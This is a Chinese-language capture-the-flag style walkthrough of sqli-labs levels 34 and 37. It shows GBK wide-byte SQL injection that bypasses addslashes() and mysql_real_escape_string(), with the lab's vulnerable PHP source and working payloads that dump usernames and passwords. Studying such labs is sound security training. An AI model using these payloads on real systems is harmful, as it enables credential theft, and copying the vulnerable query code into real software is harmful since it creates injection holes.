sqli labs 通關指南 Less 34 37

2022-03-08 21:01:23 字數 3950 閱讀 5330

less 34、37 和 less 32、33、35、36 一樣,輸入的引數都會被轉義,不同在於這 2 關使用 post 方法提交引數,也是通過寬位元組注入進行攻擊。

目錄less 37

注入正常的引數,網頁回顯正常資訊。注入單引號對引數進行閉合,網頁雖然返回了正確的資訊,但是對單引號進行了轉義。

由於這裡是使用 post 方法提交引數,使用 brup 抓包下來,得到提交的引數格式。

uname=&passwd=&submit=submit
仍讓使用 %df 把斜槓吃掉,網頁返回錯誤資訊。

把後面的內容注釋掉,網頁回顯登入失敗,說明此處有單引號閉合的字元型注入。

判斷有幾列可用。

爆資料庫名。

爆表名。

爆欄位名。

爆出使用者名稱和密碼。

使用 post 方法提交引數,引數都使用 addslashes() 函式進行轉義。

$uname1 = $_post['uname'];


$passwd1 = $_post['passwd'];


//echo "username before addslashes is :".$uname1 ."


";//echo "input password before addslashes is : ".$passwd1. "


";$uname = addslashes($uname1);


$passwd = addslashes($passwd1);


//echo "username after addslashes is :".$uname ."


";//echo "input password after addslashes is : ".$passwd; 


// connectivity 


mysql_query("set names gbk");


@$sql = "select username, password from users where username='$uname' and password='$passwd' limit 0,1";


$result = mysql_query($sql);


$row = mysql_fetch_array($result);
注入正常的引數,網頁回顯正常資訊。注入單引號對引數進行閉合,網頁雖然返回了正確的資訊,但是對單引號進行了轉義。仍讓使用 %df 把斜槓吃掉,網頁返回錯誤資訊。

把後面的內容注釋掉,網頁回顯登入失敗,說明此處有單引號閉合的字元型注入。

uname=admin%df'--+&passwd=&submit=submit
注入過程和 less 34 完全一樣,爆出使用者名稱和密碼。

uname=1%df' union select group_concat(concat_ws(0x3a,username,password)),2 from security.users--+&passwd=&submit=submit
使用 post 方法提交引數,引數都使用 mysql_real_escape_string() 函式進行轉義。

$uname1 = $_post['uname'];


$passwd1 = $_post['passwd'];


//echo "username before addslashes is :".$uname1 ."


";//echo "input password before addslashes is : ".$passwd1. "


";$uname = mysql_real_escape_string($uname1);


$passwd = mysql_real_escape_string($passwd1);


//echo "username after addslashes is :".$uname ."


";//echo "input password after addslashes is : ".$passwd; 


// connectivity 


mysql_query("set names gbk");


@$sql = "select username, password from users where username='$uname' and password='$passwd' limit 0,1";


$result = mysql_query($sql);


$row = mysql_fetch_array($result);

Sqli LABS通關筆錄 2

在這個關卡學習到了 1.程式的錯誤不是學校收費亂來的,單引號的錯誤和減號的錯誤要明白 單引號報錯。用第一關的payload嘗試了下。來看看原始碼 那麼我們構造的sql也就變成了 sql select from users where id 1 or 1 1 limit 0,1 如此一來id 1 就不...

Sqli LABS通關筆錄 4

這一關卡讓我學習到了 1.管他如何,想方設法先讓sql報錯再說。從報錯中構造sql注入語句。2.單引號不行就來雙引號。括號等等的。這次單引號沒反應了。以後我們先來黑盒測試,實在沒轍再看 1有反應但是沒資料 想辦法把他弄報錯。正在掙扎之際。成功了。不下心看了一下原始碼的。否則還真不好搞。測試了很多方法...

Sqli LABS通關筆錄 1

在第乙個關卡當中還是學到些知識。1.注釋語句多試試其他的幾個 2.不報錯可能是前面的語句沒有錯誤,union沒有得到執行。加單引號報錯了。從上面的錯誤提示當中,我們可以看到提交到sql中的1 在經過sql語句構造後形成 1 limit 0,1,多加了乙個 接下來想如何將多餘的 去掉 可以借鑑一下原始...